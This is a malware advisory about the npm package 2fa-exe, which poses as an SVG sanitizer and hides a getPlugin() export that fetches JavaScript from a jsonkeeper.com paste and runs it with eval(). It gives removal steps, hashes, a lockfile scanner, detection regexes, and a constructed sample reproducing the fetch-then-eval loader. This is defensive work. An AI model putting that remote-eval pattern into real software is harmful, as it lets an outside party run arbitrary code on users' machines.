Malicious package

2fa-exe (npm)

Malicious code in 2fa-exe (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5740
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall 2fa-exe

What this malware does

Package advertises itself as an SVG fetcher/sanitizer but ships an undocumented exported factory getPlugin() in index.js that performs an HTTPS GET to https://www.jsonkeeper.com/b/NGY3C (an anonymous, attacker-mutable JSON-paste service) and passes the response's model field directly to eval(). Any consumer that calls getPlugin() — or any tooling that mass-invokes a package's exports — executes arbitrary JavaScript fetched from a third-party paste at the moment of the call. The remote payload can change at any time without a new package release, so today's benign content provides no assurance about tomorrow's. The package name 2fa-exe also has no relationship to the stated SVG-sanitizer purpose, consistent with bait/lure framing. There is no integrity check, no pinning, and no mention of this behavior in the README.
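As an added triage example (not O3 Security's tooling and not code from the package), a Node script that finds the flagged 2fa-exe versions in a lockfileVersion 2/3 package-lock and applies a static fetch-then-eval heuristic to a package's source; the sample lock and source below are constructed, with a placeholder in place of the real paste URL.

```javascript
// The package and versions flagged in this advisory.
const FLAGGED = { name: '2fa-exe', versions: new Set(['1.0.0', '1.0.1']) };

// Walk a lockfileVersion 2/3 "packages" map (keys are node_modules paths) and
// return every copy of the flagged package, including nested installs.
function findFlaggedPackages(lock, flagged = FLAGGED) {
  const hits = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === '') continue;                               // root project entry
    const name = entry.name || path.split('node_modules/').pop();
    if (name === flagged.name && flagged.versions.has(entry.version)) {
      hits.push({ path, version: entry.version });
    }
  }
  return hits;
}

// Static signals for the behaviour described above: source that both reaches
// the network and hands data to eval/new Function. A match means a human
// should read the file; it is a triage signal, not a verdict.
function remoteEvalSignals(source) {
  const network = /\b(?:https?\.(?:get|request)|fetch|axios(?:\.\w+)?)\s*\(/.test(source);
  const dynamicEval = /\beval\s*\(|new\s+Function\s*\(/.test(source);
  const pasteHost = /jsonkeeper\.com/i.test(source);         // host named in this advisory
  return { network, dynamicEval, pasteHost, suspicious: network && dynamicEval };
}

// Constructed sample inputs (not the real lockfile or the package's source).
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'my-app', version: '0.1.0' },
    'node_modules/2fa-exe': { version: '1.0.1' },
    'node_modules/left-pad': { version: '1.3.0' },
  },
};
const SAMPLE_SOURCE = [
  "const https = require('https');",
  "exports.getPlugin = () => https.get('https://www.jsonkeeper.com/b/PLACEHOLDER', (r) => {",
  "  let b = ''; r.on('data', (c) => (b += c)); r.on('end', () => eval(JSON.parse(b).model));",
  '});',
].join('\n');

console.log(findFlaggedPackages(SAMPLE_LOCK));   // [{ path: 'node_modules/2fa-exe', version: '1.0.1' }]
console.log(remoteEvalSignals(SAMPLE_SOURCE));   // suspicious: true, pasteHost: true
```

To run it against a real project, pass `JSON.parse(fs.readFileSync('package-lock.json'))` to findFlaggedPackages and each dependency's index.js text to remoteEvalSignals.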

Malicious versions

2 flagged: 1.0.0, 1.0.1

Indicators of compromise (SHA-256)

acf790567380a784696688f56e72fca7d56d6992adf31b7857d34abc242d3485
ae22a4f75735f102ab93f3acb4d6cb97867a2244a2b1235bf3cb1313eaab30c6
d15402567a83c6520335b1f3ce315e10089c9ad19d77d7f82a6890fe3faf99e0
df3ad6044ca4d17d594aa3aa0d1a75d1dbf3ebf483d0dd1b04d502277674a8cc

Frequently asked questions

Is 2fa-exe safe to use?

No. 2fa-exe on npm has been identified as a malicious package (versions 1.0.0 and 1.0.1 flagged). It should be removed immediately — do not install it or keep it in your dependency tree.

Campaign

  • IN-MAL-2026-006375
  • IN-MAL-2026-006377
  • IN-MAL-2026-006374
  • IN-MAL-2026-006376

Credits

  • Amazon Inspector · finder
